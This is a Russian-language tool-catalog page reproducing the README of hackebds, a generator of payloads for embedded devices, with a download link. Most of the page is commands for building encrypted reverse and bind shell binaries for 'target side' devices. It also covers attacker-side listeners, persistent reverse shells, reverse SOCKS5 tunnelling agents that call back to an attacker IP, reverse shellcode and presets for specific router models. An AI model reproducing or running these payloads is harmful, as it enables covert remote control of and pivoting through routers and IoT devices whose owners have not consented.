Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/doudoudedi/hackembedded
Безопасность встроенных системИнструменты шифрования/дешифрованияБезопасность IoTГенерация полезной нагрузкиЭксплуатацияОбратная инженерияШелл-кодТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного ДоступаАнализ Прошивок
2073225 дней назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
doudoudedi/hackembedded

hackEmbedded

Этот инструмент используется для шифрования бэкдоров, генерации shellcode и socks5-прокси, извлечения информации и организации POC для устройств с различной архитектурой.

Репозиторий

hackebds

PyPI - WheelPyPI - Python Version Downloads PyPI - Downloads

🔗中文 readme

Обзор

hackebds — это набор инструментов для генерации полезных нагрузок для встраиваемых устройств, шифрованных оболочек, туннелирования SOCKS5-прокси и поиска информации об устройствах.

Текущая ветка использует чистый ELF-метод для шифрованной оболочки и функций прокси:

  • reverse_shell_file + encrypted_shell_server / reverse_shell_server
  • bind_shell + bind_shell_client
  • reverse_proxy_file + reverse_proxy_server
  • forward_proxy_file

Что изменилось в новой версии

  • Добавлены шифрованная обратная оболочка и шифрованная привязная оболочка для поддерживаемых архитектур в текущем дереве
  • Добавлен ELF-прослушиватель encrypted_shell_server / reverse_shell_server, чтобы можно было принимать зашифрованные обратные оболочки без обработчиков времени выполнения Python
  • Добавлен ELF-соединитель bind_shell_client для bind_shell
  • Добавлены ELF-методы для обратного SOCKS5-прокси и прямого SOCKS5-прокси
  • Добавлен выбор шифров aes и chacha20 для шифрованного трафика оболочки/прокси
  • Добавлен -bind_ip для ELF-бинарников на стороне прослушивателя, таких как bind_shell, encrypted_shell_server, reverse_proxy_server и forward_proxy_file
  • Оставлены reverse_shell_file и как исходящие полезные нагрузки: они используют и не привязывают локальный IP прослушивателя

Установка

root@kitploit:~
python3 -m pip install -U hackebds

Локальная установка для разработки:

root@kitploit:~
git clone https://github.com/doudoudedi/hackEmbedded
cd hackEmbedded
python3 -m pip install -e .

Сборка на другой машине

Если вы пересобираете релизные wheels на другом хосте, используйте исходный zip и build_release.py.

root@kitploit:~
unzip hackebds-0.4.3-source-for-x86-build.zip
cd hackebds-0.4.0.backup-20260411T142751Z
python3 -m pip install -U pip setuptools wheel cython
python3 build_release.py --plat manylinux2014_x86_64

Требуемые Binutils

Установите binutils для целевой архитектуры перед генерацией не-нативных ELF-файлов.

root@kitploit:~
sudo apt install binutils-aarch64-linux-gnu
sudo apt install binutils-arm-linux-gnueabi
sudo apt install binutils-mips-linux-gnu
sudo apt install binutils-mipsel-linux-gnu
sudo apt install binutils-mips64-linux-gnuabi64
sudo apt install binutils-mips64el-linux-gnuabi64
sudo apt install binutils-powerpc-linux-gnu
sudo apt install binutils-riscv64-linux-gnu

Пользователи macOS могут использовать pwntools binutils:

root@kitploit:~
brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb

Примеры использования

1. Шифрованная обратная оболочка

Сторона атакующего:

root@kitploit:~
hackebds -arch x64 -res encrypted_shell_server \
  -reverse_port 4444 \
  -bind_ip 192.168.56.1 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_server.elf

chmod +x reverse_server.elf
./reverse_server.elf

Сторона цели:

root@kitploit:~
hackebds -arch mipsel -res reverse_shell_file \
  -reverse_ip 192.168.56.1 -reverse_port 4444 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_payload.elf

chmod +x reverse_payload.elf
./reverse_payload.elf

Примечания:

  • reverse_shell_file не поддерживает -bind_ip
  • encrypted_shell_server поддерживает -bind_ip
  • измените -cipher chacha20 на -cipher aes, чтобы использовать AES

2. Шифрованная привязная оболочка

Сторона цели:

root@kitploit:~
hackebds -arch aarch64 -res bind_shell \
  -bind_port 5555 \
  -bind_ip 192.168.56.20 \
  -passwd "s3cr3t" \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename bind_shell.elf

chmod +x bind_shell.elf
./bind_shell.elf

Сторона атакующего:

root@kitploit:~
hackebds -arch x64 -res bind_shell_client \
  -reverse_ip 192.168.56.20 -reverse_port 5555 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename bind_client.elf

chmod +x bind_client.elf
./bind_client.elf

Затем введите:

root@kitploit:~
s3cr3t
id
uname -a
exit

3. Постоянная обратная оболочка

Прослушиватель:

root@kitploit:~
hackebds -arch x64 -res encrypted_shell_server --power \
  -reverse_port 4444 \
  -bind_ip 192.168.56.1 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename power_server.elf

./power_server.elf

Полезная нагрузка:

root@kitploit:~
hackebds -arch armelv7 -res reverse_shell_file --power -sleep 10 \
  -reverse_ip 192.168.56.1 -reverse_port 4444 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename power_payload.elf

4. Шифрованный обратный SOCKS5 прокси

Сервер:

root@kitploit:~
hackebds -arch x64 -res reverse_proxy_server \
  -agent_port 7000 -socks_port 1080 \
  -bind_ip 192.168.56.1 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_proxy_server.elf

chmod +x reverse_proxy_server.elf
./reverse_proxy_server.elf

Агент:

root@kitploit:~
hackebds -arch mips64el -res reverse_proxy_file \
  -reverse_ip 192.168.56.1 -reverse_port 7000 \
  -cipher chacha20 -encrypt_key "demo-key" \
  -filename reverse_proxy_agent.elf

chmod +x reverse_proxy_agent.elf
./reverse_proxy_agent.elf

Тест:

root@kitploit:~
curl --socks5-hostname 127.0.0.1:1080 http://example.com/

Сервер с аутентификацией:

root@kitploit:~
hackebds -arch x64 -res reverse_proxy_server \
  -agent_port 7000 -socks_port 1080 \
  -bind_ip 192.168.56.1 \
  -socks_auth user:pass \
  -cipher aes -encrypt_key "demo-key" \
  -filename reverse_proxy_server_auth.elf

Примечание по UDP:

  • обратный SOCKS5-прокси имеет поддержку UDP на реализованных не-SPARC путях прокси
  • sparc / sparc64 не следует рассматривать как поддерживающие UDP

5. Прямой SOCKS5 прокси

root@kitploit:~
hackebds -arch x64 -res forward_proxy_file \
  -listen_port 1081 \
  -bind_ip 192.168.56.1 \
  -filename forward_proxy.elf

chmod +x forward_proxy.elf
./forward_proxy.elf

Тест:

root@kitploit:~
curl --socks5-hostname 127.0.0.1:1081 http://example.com/

6. Обратный шеллкод

root@kitploit:~
hackebds -arch armelv7 -res reverse_shellcode \
  -reverse_ip 192.168.56.1 -reverse_port 4444

7. Использование -model

root@kitploit:~
hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 \
  -model DIR-816 -res reverse_shell_file

8. Использование --mcpu

root@kitploit:~
hackebds -mcpu mips32r2 -li -arch mipsel \
  -reverse_ip 127.0.0.1 -reverse_port 9999 \
  -res reverse_shell_file

9. Использование --firmware

root@kitploit:~
hackebds --firmware ./firmware.bin

Примечания

  • -bind_ip предназначен только для ELF-файлов на стороне прослушивателя
  • reverse_shell_file и reverse_proxy_file являются исходящими полезными нагрузками и не привязывают локальный IP прослушивателя
  • reverse_proxy_server и forward_proxy_file поддерживают -bind_ip
  • примеры шифрованной оболочки/прокси работают как с chacha20, так и с aes, если обе стороны совпадают
Скачать инструмент
reverse_proxy_file
-reverse_ip